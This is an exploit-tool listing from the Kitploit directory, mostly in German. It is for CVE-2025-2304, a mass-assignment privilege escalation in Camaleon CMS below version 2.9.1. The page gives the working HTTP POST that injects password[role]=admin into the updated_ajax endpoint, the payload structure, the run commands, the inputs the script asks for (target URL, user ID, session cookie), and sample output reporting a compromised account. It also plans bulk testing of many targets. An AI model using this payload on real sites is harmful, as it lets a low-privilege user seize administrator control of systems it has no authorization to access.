Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-2304-exploit — Python-Exploit-Skript für CVE-2025-2304, eine Massenzuweisungs-Privilegieneskalation in Camaleon CMS. Automatisiert CSRF-Token-Parsing und Rollenparameter-Injektion, um authentifizierte Benutzer in kontrollierten Laborumgebungen auf Admin zu erhöhen. | Kitploit
Tools/GitHubGitHub/jeanback1/cve-2025-2304-exploit
Privilege EscalationPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
jeanback1/cve-2025-2304-exploit

CVE-2025-2304-exploit

Python-Exploit-Skript für CVE-2025-2304, eine Massenzuweisungs-Privilegieneskalation in Camaleon CMS. Automatisiert CSRF-Token-Parsing und Rollenparameter-Injektion, um authentifizierte Benutzer in kontrollierten Laborumgebungen auf Admin zu erhöhen.

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

CVE-2025-2304 - Camaleon CMS Mass Assignment Privilege Escalation

📌 Projektbeschreibung

CVE-2025-2304 ist eine Mass Assignment-Schwachstelle in Camaleon CMS (Versionen < 2.9.1), die es einem authentifizierten Benutzer ermöglicht, seine Berechtigungen auf Administrator zu erhöhen, indem er den Parameter role in Passwortänderungsanfragen manipuliert.

Python 3.x License Security Status

🚨 Technische Erklärung der Schwachstelle

Kontext der Schwachstelle

Camaleon CMS verwendet Ruby on Rails und hat in Version 2.9.0 eine Mass Assignment-Schwachstelle im Controller UsersController#updated_ajax. Der Controller verwendet .permit! ohne Einschränkungen, sodass jeder in der Anfrage gesendete Parameter direkt dem Benutzermodell zugewiesen werden kann.

Angriffsvektor

  1. Verwundbarer Endpunkt: POST /admin/users/{user_id}/updated_ajax
  2. Kritischer Parameter: password[role] gesendet innerhalb des Namensraums password
  3. Mechanismus: Der Controller verarbeitet params.require(:password) und wendet dann .permit! an, was keine Parameter filtert
  4. Ergebnis: Einschleusen des Wertes "admin" in das Feld role des Benutzers

Technischer Ablauf

root@kitploit:~
POST /admin/users/3/updated_ajax
Content-Type: application/x-www-form-urlencoded

authenticity_token=[TOKEN]&
password[password]=new_password&
password[password_confirmation]=new_password&
password[role]=admin&
password[id]=3&
_method=patch

Der Parameter password[role] wird von User.update(permitted_params) verarbeitet und aufgrund von .permit! direkt dem Benutzerdatensatz zugewiesen, wodurch die Berechtigungen von user auf admin erhöht werden.

⚡ Installation und Verwendung

Voraussetzungen

root@kitploit:~
# Python 3.6+
python3 --version

# Erforderliche Bibliotheken
pip install requests

Skriptausführung

Englische Version:

root@kitploit:~
python3 exploit_cve_2025_2304_en.py

Spanische Version:

root@kitploit:~
python3 exploit_cve_2025_2304.py

Erforderliche Eingaben

Das Skript fragt interaktiv ab:

  1. Server-Basis-URL: http(s)://domain:port
  2. Benutzer-ID: Kennung des Angreifer-Benutzers
  3. Session-Cookie: Wert von _cms_session (nach Login erhalten)
  4. Neues Passwort: Optional (Standard: P@ssw0rd_lab_2025!)

Vollständiges Befehlsbeispiel

root@kitploit:~
python3 exploit_cve_2025_2304_en.py
root@kitploit:~
[?] Base URL of the server (ex: http://localhost:3000) : http://192.168.1.100:8080
[?] User ID of the attacker user (ex: 3) : 5
[?] Session cookie (_cms_session=VALUE) : _cms_session=abc123def456

🔧 Über dieses Skript

Warum ich dies entwickelt habe?

Als ich diese Schwachstelle fand, war mein erster Impuls, sie manuell über Burp Suite zu testen – und es funktionierte. Aber ich wollte einen Schritt weiter gehen und diesen manuellen Prozess in etwas Wiederholbares und Portables verwandeln, also schrieb ich dieses Skript. Über die reine Ausnutzung des Fehlers hinaus gab mir die Erstellung die Gelegenheit, an einigen Dingen zu arbeiten, die ich wirklich interessant finde:

  • Automatisierung von mehrstufigen HTTP-Abläufen mit Session-Handling
  • Dynamisches Extrahieren von CSRF-Tokens aus Live-Antworten
  • Umgang mit inkonsistenten JSON/HTML-Antworten desselben Endpunkts
  • Genau zu wissen, wann der Exploit erfolgreich war – und wann nicht

Ich versuche nicht, Burp oder Caido zu ersetzen. Diese Werkzeuge sind für interaktive Tests unersetzlich. Dies ist nur das, was passiert, wenn ich lieber ein Skript schreibe, als mich zu wiederholen.

⚠️ Haftungsausschluss und ethische Überlegungen

WICHTIGER RECHTLICHER HINWEIS

root@kitploit:~
THIS SCRIPT IS EXCLUSIVELY FOR:
- Controlled laboratory environments
- Systems you own or have explicit authorization to test
- Educational purposes and authorized research

STRICTLY PROHIBITED:
- Use on systems without authorization
- Application with malicious intent
- Violation of data protection laws
- Compromising third-party security

The author is not responsible for misuse of this tool.

📊 Beispiel-Screenshots

Erfolgreiche Ausführung

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║        CVE-2025-2304 │ Camaleon CMS Mass Assignment          ║
║        Privilege Escalation: user → admin                    ║
║        [LABORATORY / CONTROLLED ENVIRONMENT]                 ║
╚══════════════════════════════════════════════════════════════╝

[✔] CSRF token obtained: abc123def456...
[✔] EXPLOIT SUCCESSFUL: Server confirmed the update.
[✔] Status : COMPROMISED
   User 5 should now have 'admin' role.

Payload-Struktur

root@kitploit:~
{
    "authenticity_token": "abcd1234",
    "password[password]": "P@ssw0rd_lab_2025!",
    "password[password_confirmation]": "P@ssw0rd_lab_2025!",
    "password[role]": "admin",
    "password[id]": "5",
    "_method": "patch"
}

🛠 Roadmap und zukünftige Verbesserungen

Geplante Verbesserungen

  1. Login-Automatisierung: Integration zur automatischen Sitzungserlangung
  2. Versionserkennung: Fingerprinting-Skript zur Bestätigung der verwundbaren Version
  3. Verbose/quiet mode für sauberere Ausgabe in automatisierten Pipelines
  4. Bulk-Tests: Fähigkeit zum gleichzeitigen Testen mehrerer Benutzer/URLs
  5. Generierter Bericht: Export der Ergebnisse im JSON/HTML-Format

Erweiterbarkeit

Der Code ist modular strukturiert, um Folgendes zu erleichtern:

  • Anpassung an andere Mass Assignment-Schwachstellen
  • Integration in Pentesting-Frameworks
  • Hinzufügen von Protokollierungs- und Überwachungsfunktionen

📚 Referenzen und Ressourcen

  • Offizielles CVE: CVE-2025-2304
  • Camaleon CMS: Offizielles Repository
  • Patch: Version 2.9.1 behebt die Verwendung von .permit!
  • Rails-Dokumentation: Strong Parameters

🤝 Beiträge

Beiträge sind willkommen, die:

  1. Die Erkennung des Erfolgszustands verbessern
  2. Funktionalität unter Wahrung des ethischen Fokus hinzufügen
  3. Fehler beheben oder die Fehlerbehandlung verbessern
  4. Zusätzliche Anwendungsfälle dokumentieren

Denken Sie daran: Dieses Projekt dient ausschließlich Bildungs- und autorisierten Forschungszwecken.


Letzte Aktualisierung: April 2025 | Von Sicherheitsanalyst (Laborumgebung)

Tool herunterladen